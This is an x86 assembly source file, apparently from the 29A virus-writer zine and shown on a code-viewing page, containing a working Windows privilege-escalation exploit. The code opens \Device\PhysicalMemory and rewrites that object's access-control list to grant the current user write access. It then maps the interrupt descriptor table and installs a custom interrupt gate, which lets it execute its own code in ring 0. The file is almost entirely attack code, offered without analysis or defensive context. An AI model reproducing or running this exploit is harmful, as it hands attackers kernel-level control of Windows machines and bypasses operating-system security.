📄 29a-7.001
字号:
.386p
.model flat
extern GetModuleHandleA:proc
extern GetProcAddress:proc
extern LoadLibraryA:proc
extern FreeLibrary:proc
extern CloseHandle:proc
extern MapViewOfFile:proc
extern UnmapViewOfFile:proc
extern WriteFile:proc
extern ExitProcess:proc
OBJ_CASE_INSENSITIVE equ 40h
SECTION_MAP_WRITE equ 2
SECTION_MAP_READ equ 4
MEM_PRIVATE equ 20000h
MEM_MAPPED equ 40000h
DACL_SECURITY_INFORMATION equ 4
SE_KERNEL_OBJECT equ 6
GRANT_ACCESS equ 1
NO_MULTIPLE_TRUSTEE equ 0
TRUSTEE_IS_NAME equ 1
TRUSTEE_IS_USER equ 1
INTNUMBER equ 0ffh
.data
ntdll db "ntdll", 0
NtOpenSection db "NtOpenSection", 0
SetSecurityInfo db "SetSecurityInfo", 0
SetEntriesInAclA db "SetEntriesInAclA", 0
GetSecurityInfo db "GetSecurityInfo", 0
advapi32 db "advapi32", 0
object_name dw offset object_buffer_e1 - offset object_buffer, offset object_buffer_e2 - offset object_buffer
dd offset object_buffer
object_buffer dw '\', 'd', 'e', 'v', 'i', 'c', 'e', '\', 'p', 'h', 'y', 's', 'i', 'c', 'a', 'l', 'm', 'e', 'm', 'o', 'r', 'y'
object_buffer_e1 dw 0
object_buffer_e2 equ $
align 4 ;required for object_attributes
object_attributes dd offset object_attributes_e - offset object_attributes, 0, offset object_name, OBJ_CASE_INSENSITIVE, 0, 0
object_attributes_e equ $
explicit_access dd SECTION_MAP_WRITE, GRANT_ACCESS, 0, 0, NO_MULTIPLE_TRUSTEE, TRUSTEE_IS_NAME, TRUSTEE_IS_USER, offset current_user
current_user db "CURRENT_USER", 0
instaddr db 0ah dup (?)
.code
code_begin label near
push offset ntdll
call GetModuleHandleA
test eax, eax
je exit_code
push offset NtOpenSection
push eax
call GetProcAddress
xchg esi, eax
push eax
mov ebx, esp
mov edi, offset object_attributes
push edi
push SECTION_MAP_READ or SECTION_MAP_WRITE
push ebx
call esi
test eax, eax
jns hook_interrupt
push edi
push MEM_MAPPED or MEM_PRIVATE
push ebx
call esi
push eax
mov ebp, esp
xor eax, eax
push eax
push eax
mov ecx, esp
push eax
mov edx, esp
push eax
push DACL_SECURITY_INFORMATION
push SE_KERNEL_OBJECT
push dword ptr [ebx]
push offset SetSecurityInfo
push ecx
push edx
push offset explicit_access
push 1
push offset SetEntriesInAclA
push ebp
push eax
push edx
push eax
push eax
push DACL_SECURITY_INFORMATION
push SE_KERNEL_OBJECT
push dword ptr [ebx]
push offset GetSecurityInfo
push offset advapi32
call LoadLibraryA
push eax
xchg ebp, eax
call GetProcAddress
call eax
push ebp
call GetProcAddress
call eax
push ebp
call GetProcAddress
call eax
pop eax
push ebp
call FreeLibrary
push dword ptr [ebx]
call CloseHandle
push edi
push SECTION_MAP_READ or SECTION_MAP_WRITE
push ebx
call esi
test eax, eax
js exit_code
hook_interrupt label near
push eax
sidt fword ptr [esp - 2]
pop esi
btr esi, 1fh
push 1
push esi
push 0
push SECTION_MAP_WRITE
push dword ptr [ebx]
call MapViewOfFile
push eax
and esi, 0fffh
lea esi, dword ptr [eax + esi + INTNUMBER * 8]
fild qword ptr [esi]
call skip_ring0
;begin ring 0
mov ebp, cr0
iretd
;end ring 0
skip_ring0 label near
pop word ptr [esi]
mov byte ptr [esi + 2], 8
mov byte ptr [esi + 5], 0eeh
pop word ptr [esi + 6]
int INTNUMBER
fistp qword ptr [esi]
call UnmapViewOfFile
call CloseHandle
push 0
push esp
push size instaddr
mov edi, offset instaddr
push edi
push -11 ;STD_OUTPUT_HANDLE
call hex2asc ;convert offset to ASCII
mov ax, 0a0dh
stos word ptr [edi]
call WriteFile ;print to screen
exit_code label near
push 0
call ExitProcess
hex2asc proc near
call dd2asc
dd2asc proc near
call dw2asc
dw2asc proc near
shld eax, ebp, 8
shl ebp, 8
aam 10h
call db2asc
db2asc proc near
xchg ah, al
cmp al, 0ah
sbb al, 69h
das
stos byte ptr [edi]
ret
db2asc endp
dw2asc endp
dd2asc endp
hex2asc endp
end code_begin
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -